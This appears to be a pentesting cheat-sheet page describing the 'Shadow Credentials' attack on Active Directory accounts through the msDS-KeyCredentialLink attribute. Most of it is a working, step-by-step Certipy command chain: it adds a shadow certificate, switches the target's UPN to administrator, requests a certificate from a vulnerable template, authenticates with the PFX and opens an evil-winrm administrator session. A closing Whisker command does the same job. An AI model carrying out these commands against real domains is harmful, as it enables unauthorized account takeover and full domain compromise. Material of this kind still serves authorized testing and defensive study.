icon

Shadow Credentials

Last modified: 2025-03-15

Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.

Exploit

If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.

Using Certipy

# 1. Add a shadow certificate for the target user account
certipy shadow auto -u <user>@<target-ip> -hashes <nt-hash-of-user> -account <target-user>

# 2. Update the target account's UPN (User Principal Name) to "administrator"
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn administrator

# (Option) Find vulnerable template (check values for 'Template Name' and 'Certificate Authorities'. They will be used for the later commands)
certipy find -u <ca>@<target-ip> -hashes <nthash-of-ca> -stdout -vulnerable

# 3. Request a certificate for the target account using a vulnerable CA template
certipy req -u <target-user>@<target-ip> -hashes <nt-hash-of-target-user> -ca <ca> -template <template>

# 4. Restore the target account's UPN to its original value
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> user <target-user> -upn <target-user>@<target-ip>

# 5. Authenticate as the administrator using the obtained PFX certificate
certipy auth -pfx administrator.pfx -domain "example.local"

# 6. Establish a remote WinRM session as the administrator using their NTLM hash
evil-winrm -i <target-ip> -u administrator -H <nt-hash-of-administrator>

Using Whisker

Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.

Whisker.exe add /target:john /domain:example.local